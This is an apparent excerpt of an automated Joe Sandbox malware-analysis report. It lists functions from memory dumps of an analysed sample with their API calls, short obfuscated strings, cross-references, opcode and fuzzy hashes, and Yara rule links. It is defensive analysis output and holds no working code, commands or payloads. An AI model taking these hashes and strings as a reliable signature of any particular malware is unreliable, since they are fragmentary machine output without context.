RCC, xrefs: 04A2C346

Memory Dump Source

Source File: 00000000.00000002.1949513985.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a20000_file.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
Instruction ID: d8e2a89b7b7f6a906047787d1124c0079c762cb0ea7379485fb8a6dc1075435b
Opcode Fuzzy Hash: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
Instruction Fuzzy Hash: 8A414A72900119EFDF16CF98CE84AEEBBB5BF48314F148059F914A7225D335A950EF60

Function 00401330 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D

__Init_thread_footer.LIBCMT ref: 004013BB

Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F

Strings

JAY@, xrefs: 00401350
BAOJ, xrefs: 0040138A

Memory Dump Source

Source File: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
String ID: BAOJ$JAY@
API String ID: 2296764815-1137680417
Opcode ID: 8afcb876ddc2999c1ba0bad2701e5863db79a9b1fdbf3493768d7342b1c45fce
Instruction ID: cf4989964709d5cf6b10aa031a618c24b72f45a9210e311b945b03c0b8b43901
Opcode Fuzzy Hash: 8afcb876ddc2999c1ba0bad2701e5863db79a9b1fdbf3493768d7342b1c45fce
Instruction Fuzzy Hash: E5217170F002848AD730DF39E8467AAB7A0FB15304F90423AE8456B2B2DBB81981CB0D

Function 04A21597 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

Part of subcall function 04A29F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04A29F37
Part of subcall function 04A29F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04A29F74

__Init_thread_footer.LIBCMT ref: 04A21622

Part of subcall function 04A29EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04A29EEC
Part of subcall function 04A29EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04A29F1F

Strings

BAOJ, xrefs: 04A215F1
JAY@, xrefs: 04A215B7

Memory Dump Source

Source File: 00000000.00000002.1949513985.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a20000_file.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer
String ID: BAOJ$JAY@
API String ID: 4132704954-1137680417
Opcode ID: 6a6592139864edd19948d288d5ea32045136f2484dc71c592f5547b1ee2d657f
Instruction ID: ad58a942e7c4215131d9c1d5daeeb5355db12c036b9535c6bee6754c8df4d841
Opcode Fuzzy Hash: 6a6592139864edd19948d288d5ea32045136f2484dc71c592f5547b1ee2d657f
Instruction Fuzzy Hash: 47217CB0F003548AE730DF3DEA057AAB3A0FB15308FA44269D8445B261DBB52586DB09

Function 00408480 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D

__Init_thread_footer.LIBCMT ref: 004084EE

Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F

Strings

[@G_, xrefs: 00408497
G@ZK, xrefs: 004084A0

Memory Dump Source

Source File: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
String ID: G@ZK$[@G_
API String ID: 2296764815-2338778587
Opcode ID: 83c89cb96f0188348aa664fe5a3b9a2307e547b5dfc0b364f734f744eaf6d0b1
Instruction ID: 2d9fbaa08c13fc83b2f5e0005e6d1fa5ae776f13101647786266d8808d8cc77d
Opcode Fuzzy Hash: 83c89cb96f0188348aa664fe5a3b9a2307e547b5dfc0b364f734f744eaf6d0b1
Instruction Fuzzy Hash: F501DB70F00285DFC710EBB9AD41969B7A0A719310BA1417EE526BB3D2EA79AC01CB4D

Function 00407E80 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D

__Init_thread_footer.LIBCMT ref: 00407EEE

Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F

Strings

G@ZK, xrefs: 00407EA0
[@G_, xrefs: 00407E97

Memory Dump Source

Source File: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
String ID: G@ZK$[@G_
API String ID: 2296764815-2338778587
Opcode ID: 9d937272391ced5062343f2fa694021c1e821d7a0b24c59750c86be7e58ed2ae
Instruction ID: 86c78c31387f24dba649c5f85d45a7e4d1f1fe09f4149f0eb9c238fce71b3fdb
Opcode Fuzzy Hash: 9d937272391ced5062343f2fa694021c1e821d7a0b24c59750c86be7e58ed2ae
Instruction Fuzzy Hash: D601D6F0F05244DBD720DBA9AC41A6AB7B0AB09304F9005BAF51977792DA396C41CB49

Function 04A286E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 04A29F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04A29F37
Part of subcall function 04A29F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04A29F74

__Init_thread_footer.LIBCMT ref: 04A28755

Part of subcall function 04A29EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04A29EEC
Part of subcall function 04A29EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04A29F1F

Strings

G@ZK, xrefs: 04A28707
[@G_, xrefs: 04A286FE

Memory Dump Source

Source File: 00000000.00000002.1949513985.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a20000_file.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer
String ID: G@ZK$[@G_
API String ID: 4132704954-2338778587
Opcode ID: c5541afd9278791e683032a0605f61e379c7bee72b326041da17bc8a9c68a871
Instruction ID: 1739bc081917f849939f70fcbd7b79002bef4d1a4f712b6783f66501fc8e420f
Opcode Fuzzy Hash: c5541afd9278791e683032a0605f61e379c7bee72b326041da17bc8a9c68a871
Instruction Fuzzy Hash: EA0126B0F00254DFC710EFBCAE40969B7B0AB19710FA00269E536AB290DB39B4019B05

Function 04A280E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 04A29F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04A29F37
Part of subcall function 04A29F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04A29F74

__Init_thread_footer.LIBCMT ref: 04A28155

Part of subcall function 04A29EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04A29EEC
Part of subcall function 04A29EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04A29F1F

Strings

[@G_, xrefs: 04A280FE
G@ZK, xrefs: 04A28107

Memory Dump Source

Source File: 00000000.00000002.1949513985.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a20000_file.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer
String ID: G@ZK$[@G_
API String ID: 4132704954-2338778587
Opcode ID: 3643e019afddb0ded186ab5a90822b7330a81e91dcde7fa05791cd6361697cb6
Instruction ID: 930e6ec0b1f811018c8d30f682bb35afd2cc248e757f17f91716f15d10e6ae34
Opcode Fuzzy Hash: 3643e019afddb0ded186ab5a90822b7330a81e91dcde7fa05791cd6361697cb6
Instruction Fuzzy Hash: 730126F0F01214DBD720EFACAE40A69B7B0AB09700FA006A9F4196B3A0DB3974419B05

Function 00407830 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D

__Init_thread_footer.LIBCMT ref: 00407899

Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F

Strings

@G@K, xrefs: 00407846
A@K., xrefs: 0040784D

Memory Dump Source

Source File: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
String ID: @G@K$A@K.
API String ID: 2296764815-2457859030
Opcode ID: 94f704d5fcaaa4a6a86cea28288e2267e04fc7853d895301023c40d4626a8c24
Instruction ID: 02867bdc75deabfbdae8ac7f1914e191d6f0b036ba1bc0e64f50d331b9525a60
Opcode Fuzzy Hash: 94f704d5fcaaa4a6a86cea28288e2267e04fc7853d895301023c40d4626a8c24
Instruction Fuzzy Hash: 94016271F042049BC710DF58E946A58B7B0EB48304F60417BE906A7392D779AE418B5D

Function 00407940 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D

__Init_thread_footer.LIBCMT ref: 004079A9

Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F

Strings

@G@K, xrefs: 00407956
ZYA., xrefs: 0040795D

Memory Dump Source

Source File: 00000000.00000002.1946726542.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
String ID: @G@K$ZYA.
API String ID: 2296764815-4236202813
Opcode ID: 2083bbc37204df75ae5e3194cbdbfa2277e554d398516f573e64da7e7003365e
Instruction ID: d8be7bc43f2ac3a424769131d28bfe1308d6783f1b1820d008cdb8cd51ef09c0
Opcode Fuzzy Hash: 2083bbc37204df75ae5e3194cbdbfa2277e554d398516f573e64da7e7003365e
Instruction Fuzzy Hash: D3018174F04248DFCB24EFA8E992A5CBBB0AB04300F90417BE915A7392D6786D01CB5D

Function 04A27A97 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 04A29F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04A29F37
Part of subcall function 04A29F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04A29F74

__Init_thread_footer.LIBCMT ref: 04A27B00

Part of subcall function 04A29EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04A29EEC
Part of subcall function 04A29EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04A29F1F

Strings

A@K., xrefs: 04A27AB4
@G@K, xrefs: 04A27AAD

Memory Dump Source

Source File: 00000000.00000002.1949513985.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a20000_file.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer
String ID: @G@K$A@K.
API String ID: 4132704954-2457859030
Opcode ID: a83cbf7a01367588a88915ca0a2ca858a472c895f782e2ee7495506aef916c1c
Instruction ID: 554a71d1a1115b8ceb14010d9ce7fc782235c3528ba9212df0155025f4efdaa0
Opcode Fuzzy Hash: a83cbf7a01367588a88915ca0a2ca858a472c895f782e2ee7495506aef916c1c
Instruction Fuzzy Hash: 9E0181B4F002149BC720DFACEA42A5D77B0E718700FA0417AD917AB390D775AA459B59

Function 04A27BA7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 04A29F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04A29F37
Part of subcall function 04A29F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04A29F74

__Init_thread_footer.LIBCMT ref: 04A27C10

Part of subcall function 04A29EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04A29EEC
Part of subcall function 04A29EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04A29F1F

Strings

@G@K, xrefs: 04A27BBD
ZYA., xrefs: 04A27BC4

Memory Dump Source

Source File: 00000000.00000002.1949513985.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4a20000_file.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer
String ID: @G@K$ZYA.
API String ID: 4132704954-4236202813
Opcode ID: e0e011dd5bc5313defc92a44cb7491cb40592dbe2e3934c573b23a31aa141d8c
Instruction ID: d193f9728476a411cce868a33ee05bd6fcd9e5ebb7a2f3e85984599297219b21
Opcode Fuzzy Hash: e0e011dd5bc5313defc92a44cb7491cb40592dbe2e3934c573b23a31aa141d8c
Instruction Fuzzy Hash: 0201ADB4F003149FCB24EFACEB91A4D7BB0AB04710F90007AD8255B390C6747945DB49